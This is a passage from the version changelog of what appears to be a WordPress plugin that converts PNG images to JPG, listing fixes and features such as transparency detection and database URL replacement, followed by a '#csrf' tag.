*   check if file really exists and if has .png extension

**3.9**

*   fix transparency default state

**3.8**

*   tested on WP 5.4
*   save transparency meta and load it instantly next time
*   image viewer – background switch
*   image viewer – centered image
*   image viewer – highlight image borders and show image size on hover

**3.7**

*   do not run second transparency detection if first one return true

**3.6**

*   metadata update fix

**3.5**

*   added support for Broken Link Checker plugin ( blc\_instances, blc\_links )

**3.4**

*   replace image url also in these database tables: yoast\_seo\_links, revslider\_static\_slides

**3.3**

*   tested on WP 5.2
*   handle duplicate names like WP – adding increment
*   optimizing code for faster processing

**3.2**

*   added support for Fancy Product Designer plugin

**3.1**

*   tested on WP 5.0
*   small cosmetic code changes

**3.0**

*   new option: convert only if JPG will have lower filesize then PNG
*   new feature: show converted images statistics
*   fix: conflict when there is already JPEG with a same name as PNG
*   fix: conflict when PNG name is part of another PNG name ( eg. ‘xyz.png’ can rename also ‘abcxyz.png’ )
*   optimized for translations

**2.6**

*   rename PNG image if JPG with the same name already exists

**2.5**

*   BUG FIXED – disabled checkboxes when autodetect is disabled

**2.4**

*   now you can disable autodetect PNG transparency

**2.3**

*   WP 4.9.1 compatibility check
*   new compatibility with Toolset Types

**2.2**

*   Repair revslider database table detection

**2.1**

*   Added option to leave original PNG image on server after conversion
*   Repair SQL replacement query

**2.0**

*   Replace image and thumbnails extension in database tables
*   Moved from Settings to Tools submenu
*   Some small fixes

**1.2**

*   Fix generating background for transparent images (thanks @darkcobalt)

**1.1**

*   Fix PNG transparency detection

**1.0**

*   First version

Tag

#csrf